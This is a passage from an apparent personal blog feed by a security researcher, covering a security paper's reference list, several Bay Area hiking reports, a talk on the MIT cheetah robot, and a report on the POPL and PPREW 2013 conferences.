attack detection. IPSJ SIG Notes (2001), 181--188.&lt;/p&gt;
&lt;p&gt;[25] Kc, G. S., Keromytis, A. D., and Prevelakis, V. Countering
code-injection attacks with instruction-set randomization. In CCS'03:
Proc. 10th Conf. on Computer and Communications Security (2003), pp.
272--280.&lt;/p&gt;
&lt;p&gt;[26] klog. &lt;a class="reference external" href="http://phrack.com/issues.html?issue=55&amp;amp;id=8"&gt;The frame pointer overwrite&lt;/a&gt;. Phrack 9, 55 (Nov. 1999).&lt;/p&gt;
&lt;p&gt;[27] McCamant, S., and Morrisett, G. Evaluating SFI for a CISC
architecture. In SSYM'06.&lt;/p&gt;
&lt;p&gt;[28] Necula, G., Condit, J., Harren, M., McPeak, S., and Weimer, W.
CCured: Type-safe retrofitting of legacy software. vol. 27, ACM, pp.
477--526.&lt;/p&gt;
&lt;p&gt;[29] Nergal. &lt;a class="reference external" href="http://phrack.com/issues.html?issue=67&amp;amp;id=8"&gt;The advanced return-into-lib(c) exploits&lt;/a&gt;. Phrack 11, 58
(Dec. 2001).&lt;/p&gt;
&lt;p&gt;[30] Newsham, T. &lt;a class="reference external" href="http://www.thenewsh.com/~newsham/format-string-attacks.pdf"&gt;Format string attacks&lt;/a&gt;, 2000.&lt;/p&gt;
&lt;p&gt;[31] OWASP. &lt;a class="reference external" href="https://www.owasp.org/index.php/Format_string_attack"&gt;Definition of format string attacks.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;[32] PaX-Team. &lt;a class="reference external" href="http://pax.grsecurity.net/docs/aslr.txt"&gt;PaX ASLR (Address Space Layout Randomization)&lt;/a&gt;, 2003.&lt;/p&gt;
&lt;p&gt;[33] Payer, M. &lt;a class="reference external" href="https://nebelwelt.net/publications/files/12TRpie.pdf"&gt;Too much pie is bad for performance&lt;/a&gt;. 2012.&lt;/p&gt;
&lt;p&gt;[34] Payer, M., and Gross, T. R. &lt;a class="reference external" href="https://nebelwelt.net/publications/files/11VEE.pdf"&gt;Fine-grained user-space security
through virtualization&lt;/a&gt;. In VEE'11.&lt;/p&gt;
&lt;p&gt;[35] Payer, M., and Gross, T. R. &lt;a class="reference external" href="https://nebelwelt.net/publications/files/13PPREW.pdf"&gt;String oriented programming: When ASLR
is not enough&lt;/a&gt;. In Proc. 2nd Program Protection and Reverse Engineering
Workshop (2013).&lt;/p&gt;
&lt;p&gt;[36] Pincus, J., and Baker, B. Beyond stack smashing: Recent advances in
exploiting buffer overruns. IEEE Security and Privacy 2 (2004), 20--27.&lt;/p&gt;
&lt;p&gt;[37] Planet, C. &lt;a class="reference external" href="http://phrack.com/issues.html?issue=67&amp;amp;id=8"&gt;A eulogy for format strings&lt;/a&gt;. Phrack 14, 67 (2010).&lt;/p&gt;
&lt;p&gt;[38] Ratanaworabhan, P., Livshits, B., and Zorn, B. Nozzle: A defense
against heap-spraying code injection attacks. In Proceedings of the
Usenix Security Symposium (Aug. 2009).&lt;/p&gt;
&lt;p&gt;[39] Shacham, H. The geometry of innocent flesh on the bone:
Return-into-libc without function calls (on the x86). In CCS'07: Proc.
14th Conf. on Computer and Communications Security (2007), pp. 552--561.&lt;/p&gt;
&lt;p&gt;[40] Shacham, H., Page, M., Pfaff, B., Goh, E.-J., Modadugu, N., and
Boneh, D. On the effectiveness of address-space randomization. In
CCS'04: Proc. 11th Conf. Computer and Communications Security (2004),
pp. 298--307.&lt;/p&gt;
&lt;p&gt;[41] SkyLined. &lt;a class="reference external" href="http://skypher.com/wiki/index.php/Www.edup.tudelft.nl/~bjwever%20/advisory_iframe.html.php"&gt;Internet explorer iframe src&amp;amp;name parameter bof
remote compromise&lt;/a&gt;, 2004.&lt;/p&gt;
&lt;p&gt;[42] Sovarel, A. N., Evans, D., and Paul, N. Where's the FEEB? the
effectiveness of instruction set randomization. In SSYM'05: Proc. 14th
Conf. on USENIX Security Symposium (2005).&lt;/p&gt;
&lt;p&gt;[43] &lt;a class="reference external" href="https://wiki.ubuntu.com/Security/Features#pie"&gt;List of Ubuntu programs built with PIE&lt;/a&gt;. March 2013.&lt;/p&gt;
&lt;p&gt;[44] &lt;a class="reference external" href="https://wiki.ubuntu.com/Security/Features"&gt;Ubuntu security features&lt;/a&gt;, May 2012.&lt;/p&gt;
&lt;p&gt;[45] van de Ven, A., and Molnar, I. &lt;a class="reference external" href="https://www.redhat.com/f/pdf/rhel/WHP0006US_Execshield.pdf"&gt;Exec shield&lt;/a&gt;. 2004.&lt;/p&gt;
&lt;p&gt;[46] Wahbe, R., Lucco, S., Anderson, T. E., and Graham, S. L. Efficient
software-based fault isolation. In SOSP'93.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Security"></category><category term="analysis"></category><category term="memory safety"></category><category term="research"></category><category term="security"></category><category term="hacking"></category></entry><entry><title>Dynamite and explosions galore: Point Pinole Regional Shoreline</title><link href="/blog/2013/0310-dynamite-and-explosions-galore-point-pinole-regional-shoreline.html" rel="alternate"></link><published>2013-03-10T19:11:00-04:00</published><updated>2013-03-10T19:11:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-03-10:/blog/2013/0310-dynamite-and-explosions-galore-point-pinole-regional-shoreline.html</id><summary type="html">&lt;p&gt;For those that know us personally it is obvious that Lumi and I are
the&amp;nbsp;adventurous&amp;nbsp;types, so when we had the opportunity to explore a
dangerous dynamite facility we grabbed it! &lt;a class="reference external" href="http://www.ebparks.org/parks/pt_pinole"&gt;Point Pinole Regional
Shoreline&lt;/a&gt; is a nice little park with a great view of the upper bay.
We …&lt;/p&gt;</summary><content type="html">&lt;p&gt;For those that know us personally it is obvious that Lumi and I are
the&amp;nbsp;adventurous&amp;nbsp;types, so when we had the opportunity to explore a
dangerous dynamite facility we grabbed it! &lt;a class="reference external" href="http://www.ebparks.org/parks/pt_pinole"&gt;Point Pinole Regional
Shoreline&lt;/a&gt; is a nice little park with a great view of the upper bay.
We left the highway after Richmond and drove to the trailhead (passing a
penitentiary on the way) and parked in the overflow parking. I guess it
can get pretty crowded on weekends, especially on Sundays in nice spring
weather (the park features several BBQ places as well).&lt;/p&gt;
&lt;p&gt;The area of the park has been used for many years by Atlas Powder Co. and
other companies to manufacture gun powder and dynamite. When strolling
through the park you can discover many old left-over buildings and
bunkers that were used in that era. Some of these places look like old
forts and are perfect playgrounds for children to explore.&lt;/p&gt;
&lt;p&gt;As we were quite tired from our long Wildcat Canyon hike the day before
we just went on an easy 4.8-mile (7.8 km) stroll through the park. We
explored several of the old facilities and sights but did not find any
left over dynamite. On the other hand we finally set off Lumi's GeoCoin
and we hope that it travels far and tells us interesting stories from
abroad!&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http:%2F%2Fnebelwelt.net%2Fgpslogs%2F20130310_Point_Pinole.kml"&gt;View Map&lt;/a&gt;&lt;/p&gt;
</content><category term="Leisure"></category><category term="easy hike"></category><category term="dynamite"></category><category term="GeoCache"></category><category term="beach"></category><category term="view"></category></entry><entry><title>Wildcat Canyon double hike</title><link href="/blog/2013/0309-wildcat-canyon-double-hike.html" rel="alternate"></link><published>2013-03-09T21:15:00-05:00</published><updated>2013-03-09T21:15:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-03-09:/blog/2013/0309-wildcat-canyon-double-hike.html</id><summary type="html">&lt;p&gt;For two weekends in a row we went for nice day hikes in &lt;a class="reference external" href="http://www.ebparks.org/parks/tilden"&gt;Tilden regional
park&lt;/a&gt; / &lt;a class="reference external" href="http://www.ebparks.org/page151.aspx"&gt;Wildcat canyon&lt;/a&gt;. The area is very nice and the views of San
Francisco and the bay area are awesome. We prepared both hikes by
looking at the GeoCaching website and planning a couple of …&lt;/p&gt;</summary><content type="html">&lt;p&gt;For two weekends in a row we went for nice day hikes in &lt;a class="reference external" href="http://www.ebparks.org/parks/tilden"&gt;Tilden regional
park&lt;/a&gt; / &lt;a class="reference external" href="http://www.ebparks.org/page151.aspx"&gt;Wildcat canyon&lt;/a&gt;. The area is very nice and the views of San
Francisco and the bay area are awesome. We prepared both hikes by
looking at the GeoCaching website and planning a couple of caches that
we wanted to lift during our hike. Both hikes are fairly long day hikes
with a length of roughly 10mi (15km).&lt;/p&gt;
&lt;div class="section" id="trail-navigation"&gt;
&lt;h2&gt;Trail navigation&lt;/h2&gt;
&lt;p&gt;For the first hike we started off at &lt;a class="reference external" href="http://www.yelp.com/biz/tilden-regional-park-little-farm-berkeley"&gt;Little Farm&lt;/a&gt; where we parked our
car as well. The trail starts right next to the parking lot and is not
clearly marked: basically, turn left as you leave the parking
lot and follow the sign to Jewel Lake.&lt;/p&gt;
&lt;p&gt;For the second hike we started in Richmond. The trailhead is right at
the parking lot and the trail continues right where the road ends.
Both times we did not have any trouble finding a parking spot but we
heard that it can get more crowded in the summer. At both spots there is
overflow parking next to the main parking lots (it might add a couple of
hundred feet to your overall journey). Please also watch out for the
park's opening hours as the gates will be closed after hours.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="hike-description"&gt;
&lt;h2&gt;Hike description&lt;/h2&gt;
&lt;p&gt;Both hikes are fairly long but manageable day hikes, at times a
bit&amp;nbsp;strenuous but overall not too exhausting. Especially on the
north-eastern side the elevation is a bit higher and it can be a climb
to get up there. As a reward you get awesome views of the bay, the
different bridges, and San Francisco.&lt;/p&gt;
&lt;p&gt;For the first hike we started from Little Farm, passed Jewel Lake and
continued along Wildcat Creek (the little river) until we arrived at the
Mezue Trail where we headed up to the ridge and returned in a loop back
to Little Farm.&lt;/p&gt;
&lt;p&gt;The second hike started at the opposite side of Tilden Park (which is
called Wildcat Canyon). We started at the trailhead there and went
straight up to the ridge to enjoy the views, walked past the Mezue trail
and turned down to the Wildcat Creek where we walked back to the parking
lot.
&lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http:%2F%2Fnebelwelt.net%2Fgpslogs%2F20130309-Wilcat_Canyon.kml"&gt;View Map&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="summary"&gt;
&lt;h2&gt;Summary&lt;/h2&gt;
&lt;p&gt;All in all, two very relaxing and enjoyable Sunday hikes; we brought our
lunches and 1/2 gallon of water per person and had a great time. There
were some people around (especially near the trailheads) but the further
you wander into the park the fewer people you will see.
One of the things that amazes me most about this park is that it is so
close to the urban area while it is very quiet once you are inside.
On the one hand you see the skyline of San Francisco; on the other hand you
can watch eagles soar for prey. And for the geocachers out there: there is
an awesome trail of roughly 20 GeoCaches along Wildcat Creek. Happy
hunting ;)&lt;/p&gt;
&lt;/div&gt;
</content><category term="Leisure"></category><category term="day hike"></category><category term="GeoCache"></category><category term="long day hike"></category><category term="view"></category></entry><entry><title>Tilden regional park: Vollmer peak</title><link href="/blog/2013/0224-tilden-regional-park-vollmer-peak.html" rel="alternate"></link><published>2013-02-24T20:04:00-05:00</published><updated>2013-02-24T20:04:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-02-24:/blog/2013/0224-tilden-regional-park-vollmer-peak.html</id><summary type="html">&lt;p&gt;A quick and easy 7.2mi (12km) hike in Tilden park with awesome views of
the bay area, including San Francisco, the Golden Gate Bridge, Oakland,
Emeryville, the Bay Bridge, Silicon Valley, and much more.&lt;/p&gt;
&lt;p&gt;We set off really late (at around 11:30am) and just drove up to Grizzly …&lt;/p&gt;</summary><content type="html">&lt;p&gt;A quick and easy 7.2mi (12km) hike in Tilden park with awesome views of
the bay area, including San Francisco, the Golden Gate Bridge, Oakland,
Emeryville, the Bay Bridge, Silicon Valley, and much more.&lt;/p&gt;
&lt;p&gt;We set off really late (at around 11:30am) and just drove up to Grizzly
Peak road where we parked the car at a trailhead. Unfortunately I forgot
my GPS, so we did not have access to the detailed OpenStreetMap maps and
got lost once or twice with just the park map.&lt;/p&gt;
&lt;p&gt;The hike was easy and non-strenuous, and we set a leisurely pace of about
2 miles per hour (3 km/h). We stopped every couple of minutes
to enjoy the awesome and impressive views of the area. It's a great and
easy hike if you only have half a day but still want to get out of the
city.&lt;/p&gt;
&lt;p&gt;View the &lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http://nebelwelt.net/gpslogs/20130224-Tilden_Hike.kml"&gt;hike&lt;/a&gt; on the map.&lt;/p&gt;
</content><category term="Leisure"></category><category term="easy hike"></category><category term="GeoCache"></category><category term="view"></category></entry><entry><title>Robots, wildlife and bioinspiration</title><link href="/blog/2013/0221-robots-wildlife-and-bioinspiration.html" rel="alternate"></link><published>2013-02-21T06:32:00-05:00</published><updated>2013-02-21T06:32:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-02-21:/blog/2013/0221-robots-wildlife-and-bioinspiration.html</id><summary type="html">&lt;p&gt;&lt;a class="reference external" href="http://biomimetics.mit.edu/"&gt;Sangbae Kim&lt;/a&gt;, professor in mechanical engineering from MIT visited
Berkeley today and gave a great inspiring talk on dynamic locomotion.
The original title of the talk was &amp;quot;Toward Highly Dynamic Locomotion:
Actuation, structure and control of the MIT cheetah robot&amp;quot;.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2013/0221/assembledcropped1.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;An early model of the cheetah robot. Image (c) &lt;a class="reference external" href="http://biomimetics.mit.edu/"&gt;biomimetics …&lt;/a&gt;&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;a class="reference external" href="http://biomimetics.mit.edu/"&gt;Sangbae Kim&lt;/a&gt;, professor in mechanical engineering from MIT visited
Berkeley today and gave a great inspiring talk on dynamic locomotion.
The original title of the talk was &amp;quot;Toward Highly Dynamic Locomotion:
Actuation, structure and control of the MIT cheetah robot&amp;quot;.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2013/0221/assembledcropped1.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;An early model of the cheetah robot. Image (c) &lt;a class="reference external" href="http://biomimetics.mit.edu/"&gt;biomimetics&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In the talk Sangbae told us about some of the awesome robots (e.g., the
fast and dynamic cockroach-inspired iSprawl, or the gecko-like Stickybot that walks up
walls) they are building in his lab and focused on details of the
cheetah robot, a bioinspired, cheetah-like, four-legged robot that
walks, trots, and runs at speeds of up to 18.5 miles per hour. While it
was not exactly clear to me why they are building this robot (maybe
because it's just awesome to have a robotic cheetah in your backyard - I
just hope that they do not plan to use those robots to hunt people) he
did a great job of explaining all the different research problems they
had to solve.&lt;/p&gt;
&lt;p&gt;The three problems he talked about in detail are:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Power:&lt;/strong&gt; you need to have enough power to keep the robot running in
the wild for a while. This problem exists even in nature, where cheetahs
are completely exhausted after a hunt. A large part of the energy is
dissipated as heat before it can be used to bring the robot into motion.
Some grad students are working on better models that reduce the power
consumption and maximize the time the robot can move. In addition, the
cheetah regenerates power from reverse motion (comparable to
regenerative braking in battery-powered electric vehicles).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Motors:&lt;/strong&gt; a second big problem is finding reliable motors that deliver high
torque at low speed. Currently the market offers mostly low-torque but
high-rotation-speed motors. These motors are good for building, e.g., a
quadrocopter, but they do not work well for a legged robot, as such a robot needs
fine-grained control over its motion and sensor feedback (e.g., with how
much force a surface is touched). A low-torque high-speed motor needs a
gear box between the motor and the tip, which makes sensing through just
the motor a hard problem. A high-torque low-speed motor can be directly
coupled with the tip and functions as a sensor as well, removing the
need for additional sensors and/or complex gear boxes. This simplifies
the design and makes the robots more robust. His lab even switched to
building their own motors for the cheetah, with a design optimized
to offer as much torque as needed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Stability:&lt;/strong&gt; wild cheetahs use their tail for stability, to save them
from a fall, or to enable fast direction changes which help them catch
their prey. Sangbae's group added a tail to their cheetah that enables
the robot to recover from missteps: &amp;quot;a tail basically buys you time&amp;quot;.
If a lateral force pushes the robot to the side then the tail can swing
and counteract that motion. The robot then reacts to the force and has
time to calculate a countermeasure.&lt;/p&gt;
&lt;p&gt;Video of the running robot. There are a ton more videos on the
biomimetics website.&lt;/p&gt;
&lt;p&gt;As a side note: after the talk I wanted to learn more about cheetahs and
watched the following video about real cheetahs. It's a great video
about the cruelty of nature and how hard animals (both predator and prey)
have to fight for survival.&lt;/p&gt;
&lt;p&gt;The talk was not focused on computer systems, nor even computer science
in general; nevertheless it was a very accessible and fun talk. I did not
understand all the mechanical and mechatronic details but was able to
follow most of the presented material. And let's be honest: robots
are awesome and I have always wanted to build one of these things!&lt;/p&gt;
</content><category term="Academia"></category><category term="MIT"></category><category term="Cheetah"></category><category term="robot"></category><category term="wildlife"></category><category term="Sangbae Kim"></category><category term="GreatTalk"></category></entry><entry><title>Hiking and Geo Caching along the Miller/Knox Regional Shoreline / the Keller Beach Park</title><link href="/blog/2013/0217-hiking-and-geo-caching-along-the-millerknox-regional-shoreline-the-keller-beach-park.html" rel="alternate"></link><published>2013-02-17T19:01:00-05:00</published><updated>2013-02-17T19:01:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-02-17:/blog/2013/0217-hiking-and-geo-caching-along-the-millerknox-regional-shoreline-the-keller-beach-park.html</id><summary type="html">&lt;p&gt;Today we went off for another short 'warm-up' hike before the big hiking
season starts. We drove to Richmond, CA where we walked along the
shoreline, explored some old railroad tracks, discovered some brick
houses (and factories), enjoyed the view over almost the complete bay
area, and strolled through Richmond's …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Today we went off for another short 'warm-up' hike before the big hiking
season starts. We drove to Richmond, CA where we walked along the
shoreline, explored some old railroad tracks, discovered some brick
houses (and factories), enjoyed the view over almost the complete bay
area, and strolled through Richmond's old town.&lt;/p&gt;
&lt;p&gt;Lumi searched the map for a nice spot and suggested that we head to
Richmond. We did not really plan this hike and just
quickly made a couple of sandwiches before we headed off. Until
now, I had always remembered Richmond as a pass-through town on
the way to Vallejo or the mall where Walmart is located. But I was
pleasantly surprised by the great spot we found.&lt;/p&gt;
&lt;p&gt;We parked our car right after the tunnel on Dornan Drive and explored
Keller Beach Park first. The park has an awesome partial bay view, some
nice BBQ spots, and even a sandy beach. Apparently, it is possible to
&lt;a class="reference external" href="http://www.yelp.com/biz/keller-beach-richmond"&gt;swim here in summer&lt;/a&gt; and we will definitely return when the water is
a bit warmer.&lt;/p&gt;
&lt;p&gt;Leaving the beach park we walked along the shoreline (and along old
rusty train tracks) up to &amp;quot;Ferry Point&amp;quot;. In earlier times this point was
the final stop of the Chicago to San Francisco train line: here
the train stopped and the passengers continued the last 7 miles of their
journey on a steam ferry over to San Francisco. It was amazing to see
the old barks and tracks that have partially fallen into the water. As an
engineer it was particularly interesting to see a seesaw-like structure
that must have been used to roll railroad wagons onto the ferry.
After we had watched the local fishermen for some time we continued towards
an old kiln (a brick factory) where we had a good look at the chimney
and the two burning chambers. It is interesting to know that many houses
were first built of brick and people only later switched to wood-only
construction (and we asked ourselves: why?).&lt;/p&gt;
&lt;p&gt;We continued towards a hill where we pushed ourselves up a steep
incline. The way up was tough but we were rewarded with an awesome view
of the bay area. Amazing is the only word that can describe that view!
We enjoyed our time there, walked back and forth a bit (found a couple
of caches) and finally walked back to the car.&lt;/p&gt;
&lt;p&gt;On the way back we stopped in the old town of Richmond, strolled
through the little streets for a bit, and wondered if Richmond already
looked like that during the gold rush. All in all we had a great
afternoon and enjoyed the time out in the California sun.
In total the big loop is about 5.9mi (roughly 10km) and it took us
about 4 hours with a couple of stops on the way and 7 geocaches. A nice
hike for a lazy Sunday afternoon.&lt;/p&gt;
&lt;p&gt;View &lt;a class="reference external" href="http://osm.quelltextlich.at/viewer-js.html?kml_url=http://nebelwelt.net/gpslogs/20130217-Ferry_Point_Loop_Trail.kml"&gt;Ferry Point Loop Trail&lt;/a&gt; in a larger map&lt;/p&gt;
&lt;div class="section" id="pictures"&gt;
&lt;h2&gt;Pictures&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0217/IMG_20130217_133338.jpg"&gt;&lt;img alt="image0" src="/blog/static/2013/0217/IMG_20130217_133338.jpg" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Little Duckling (travel bug) continues his journey but stops for the
nice view.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0217/IMG_20130217_135917.jpg"&gt;&lt;img alt="image1" src="/blog/static/2013/0217/IMG_20130217_135917.jpg" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The tracks to the seesaw are already broken down but the seesaw is still
intact.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external image-reference" href="/blog/static/2013/0217/IMG_20130217_172826.jpg"&gt;&lt;img alt="image2" src="/blog/static/2013/0217/IMG_20130217_172826.jpg" style="width: 800px;" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Good bye Richmond, it was a pleasure to see your nice side!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Leisure"></category><category term="easy hike"></category><category term="GeoCache"></category><category term="beach"></category></entry><entry><title>All paths lead to Rome: POPL and PPREW from a syssec perspective</title><link href="/blog/2013/0213-all-paths-lead-to-rome-popl-and-pprew-from-a-syssec-perspective.html" rel="alternate"></link><published>2013-02-13T17:28:00-05:00</published><updated>2013-02-13T17:28:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2013-02-13:/blog/2013/0213-all-paths-lead-to-rome-popl-and-pprew-from-a-syssec-perspective.html</id><summary type="html">&lt;div class="section" id="a-week-in-rome-what-could-be-better-than-sitting-all-day-in-a-conference-room"&gt;
&lt;h2&gt;A week in Rome: what could be better than sitting all day in a conference room?&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external" href="http://www.sigplan.org/conferences/popl/main"&gt;POPL&lt;/a&gt;&amp;nbsp;(Principles Of Programming Languages) is one of these great
conferences that have been around forever and sound very interesting to
any systems person. The definition of POPL according to the SIGPLAN
homepage is …&lt;/p&gt;&lt;/div&gt;</summary><content type="html">&lt;div class="section" id="a-week-in-rome-what-could-be-better-than-sitting-all-day-in-a-conference-room"&gt;
&lt;h2&gt;A week in Rome: what could be better than sitting all day in a conference room?&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external" href="http://www.sigplan.org/conferences/popl/main"&gt;POPL&lt;/a&gt;&amp;nbsp;(Principles Of Programming Languages) is one of these great
conferences that have been around forever and sound very interesting to
any systems person. The definition of POPL according to the SIGPLAN
homepage is: &amp;quot;&lt;em&gt;Principles of Programming Languages symposium addresses
fundamental principles and important innovations in the design,
definition, analysis, and implementation of programming languages,
programming systems, and programming interfaces.&lt;/em&gt;&amp;quot;. During my PhD I
was in a very (computer) systems and compiler oriented group and POPL
always sounded like a fun conference. So I was quite happy when I got
some of my older PhD work accepted at &lt;a class="reference external" href="http://www.pprew.org/"&gt;PPREW&lt;/a&gt; (Program Protection
and Reverse Engineering Workshop), which was co-located with POPL this
year. The 2013 POPL venue was Rome, Italy, which was even better!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-popl-conference"&gt;
&lt;h2&gt;The POPL conference&lt;/h2&gt;
&lt;p&gt;Before the conference I quickly browsed through the conference program,
recognized some names (hi Vijay D'Silva, Daniel Kroening, Ben Livshits,
and Domagoj Babic) and some of the papers sounded quite intriguing
(although I feared that I would have some trouble understanding the
overly theoretical papers and talks).&lt;/p&gt;
&lt;p&gt;The keynote on the first day by &lt;strong&gt;Georges Gonthier (MS Research)&lt;/strong&gt; was
mostly about proving theorems in &lt;a class="reference external" href="http://coq.inria.fr/"&gt;Coq&lt;/a&gt; (a theorem prover) and examples
of how to use Coq (which did help me understand the whole theorem
proving world).&lt;/p&gt;
&lt;p&gt;The highlight of the first day was &lt;strong&gt;Vijay D'Silva's&lt;/strong&gt; talk about
&lt;a class="reference external" href="http://dl.acm.org/citation.cfm?id=2429087"&gt;Abstract conflict driven learning&lt;/a&gt; (unfortunately I did not find
a free PDF version of this paper). I really enjoyed his presentation
(he's a great speaker) and the paper was added towards the top of my
reading stack.&lt;/p&gt;
&lt;p&gt;The second keynote by &lt;strong&gt;Shriram Krishnamurthi (Brown University)&lt;/strong&gt;
argued that JavaScript and HTML are basically evil languages that
have no built-in safety concepts. Missing language abstractions and the full
implicit trust of all external library functions (e.g., any included
JavaScript library like JQuery has full access to all data
of a website; all code runs in the same privilege domain with the
same priorities) make it hard for websites to safely reuse existing libraries.
Shriram discussed sandboxing and other language-based approaches to
overcome this problem.&lt;/p&gt;
&lt;p&gt;The highlight talk of the second day was &lt;strong&gt;Ben Livshits's&amp;nbsp;(MS
Research)&lt;/strong&gt; talk &lt;a class="reference external" href="ftp://ftp.deas.harvard.edu/techreports/tr-03-12.pdf"&gt;Towards fully automatic placement of security
sanitizers and declassifiers&lt;/a&gt;. A sanitizer is a function that cleans
a user-supplied input string of any potentially malicious/bad
character sequences (e.g., escape characters if the string is used in
an SQL statement, or JavaScript tags if the string is used as part of
an HTML page). A problem is that most sanitizers are neither idempotent
(i.e., they cannot be executed repeatedly on the same data without
changing the data) nor reversible (i.e., removing bad characters cannot
be undone). Ben argues that programmers are unable to place these
sanitizers at the correct locations and that an automatic analysis tool will
do a better job. The core of their analysis piggybacks on existing
compiler data-flow techniques and uses both a static and a dynamic
component. The static component uses node-based placement of
sanitizers for most of the statically detected input sources. The
remaining input sources are tagged dynamically and use dynamic data-flow
tracking to add sanitizers at runtime. So for most of the input
flows the algorithm is able to determine the location of the sanitizer
statically, while for the remaining ones it falls back
to a dynamic approach.&lt;/p&gt;
&lt;p&gt;I really liked the presentation and when Ben visited Berkeley one week
after POPL I took the opportunity to talk to him a bit before his
(re-)presentation. What bugs me a bit is that the approach is limited to
strings (so no full tracking of all kinds of data flows) and that
the strings remain static during the process. If strings are
modified or concatenated during execution then additional special
sanitizers must be added that tag parts of the string (e.g., assume that
an SQL string is being built up from multiple sources: then the approach
cannot handle the partial or concatenated strings).&lt;/p&gt;
&lt;p&gt;The keynote of the third day was by &lt;strong&gt;Noah Goodman (Stanford)&lt;/strong&gt; and he
talked about principles and practice of probabilistic programming. The
talk focused on how we can deal with uncertainty: an easy solution is
to extend the current value system and add a probabilistic component to
it. After the motivation he moved on to Lambda calculus and explained
how basic Lambda calculus can be extended with stochastic methods. I
really liked his presentation and was able to follow most of the
talk although its focus was not exactly in my comfort zone.&lt;/p&gt;
&lt;p&gt;The highlight talk of the third day was &lt;a class="reference external" href="http://www.cl.cam.ac.uk/~mb741/papers/popl13.pdf"&gt;Sigma*: Symbolic Learning of
Stream Filters&lt;/a&gt; by &lt;strong&gt;Matko&amp;nbsp;Botincan&amp;nbsp;and Domagoj Babic&lt;/strong&gt;. They
presented a nice concept for learning a symbolic
model of an application: an iterative process that
generates both under-approximations (using dynamic symbolic execution)
and over-approximations (using counter-example guided abstraction
refinement) of the application. During each step they use an SMT solver
to test for equivalence. If the two approximations are not equal then
they either extend the under-approximation or shrink the
over-approximation until they reach a fixpoint.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-pprew-workshop"&gt;
&lt;h2&gt;The PPREW workshop&lt;/h2&gt;
&lt;p&gt;After three days of POPL I was looking forward to a more low-level,
computer-systems related, and machine-code oriented workshop and
&lt;a class="reference external" href="http://www.pprew.org/"&gt;PPREW&lt;/a&gt; (Program Protection and Reverse Engineering Workshop) met and
exceeded my&amp;nbsp;expectations.&lt;/p&gt;
&lt;p&gt;First of all, &lt;strong&gt;(Jeffrey) Todd McDonald&lt;/strong&gt; gave a great introduction and
welcomed us all to the 2nd incarnation of this workshop. He hopes to
grow the workshop in the future and to attract more academic work in the
areas of program protection and reverse engineering.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Arun Lakhotia (University of Louisiana at Lafayette)&lt;/strong&gt; gave the keynote
and talked about &lt;em&gt;Fast Location of Similar Code Fragments Using
Semantic 'Juice' (BinJuice)&lt;/em&gt;. We have to move away from the old
question of whether a binary is 'bad'/malicious or not and move towards the
question of who is actually responsible for the malicious code. His idea is
to recast malware analysis as an information retrieval problem: find the closest
match of a new (malware) sample to existing code in a large code
library, or partition all samples inside the library into classes
and families. As a next step it is possible to use machine learning to
classify similarity. Code is related through code evolution (bug fixes,
capabilities, code reuse, shared libraries).&lt;/p&gt;
&lt;p&gt;A prerequisite is defining features that can be used to classify
individual executables. As part of this research they evolved the
features through different forms of abstraction: a sequence of n
bytes; disassembled text; disassembled text without relocations;
or n-mnemonic words, e.g., (je push) (push movl).&lt;/p&gt;
&lt;p&gt;An important finding is that current malware performs only block-level
transformations. Semantic features therefore catch any changes inside a block;
a remaining problem is when unused registers are used for bogus computation
across control blocks.&lt;/p&gt;
&lt;p&gt;The first talk was by &lt;strong&gt;Jack W. Davidson (University of Virginia)&lt;/strong&gt;
about &lt;a class="reference external" href="http://dl.acm.org/citation.cfm?id=2430554"&gt;Software Protection for Dynamically-Generated Code&lt;/a&gt;. The
focus of this work is program protection: slowing down the reverse
engineering of a piece of code. If code is available then reverse
engineering will always be possible; the question is how fast the 'bad
guys' will be able to crack a software protection. Jack proposes
process-level virtualization (PVM): a dynamic binary translator
that decrypts encrypted portions of a binary executable at
runtime. A static compilation process adds additional guards into the
executable, encodes the binary in a specific way, and encrypts it using some key.&lt;/p&gt;
&lt;p&gt;The second talk was &lt;strong&gt;Mathias Payer's (aka your humble author, currently
a PostDoc at UC Berkeley)&lt;/strong&gt; talk about &lt;a class="reference external" href="https://nebelwelt.net/publications/files/13PPREW.pdf"&gt;String Oriented Programming:
When ASLR is Not Enough&lt;/a&gt;. In this talk Mathias discusses the protection
mechanisms of current systems and their drawbacks. Data Execution
Prevention (DEP) is a great solution against code injection, but other
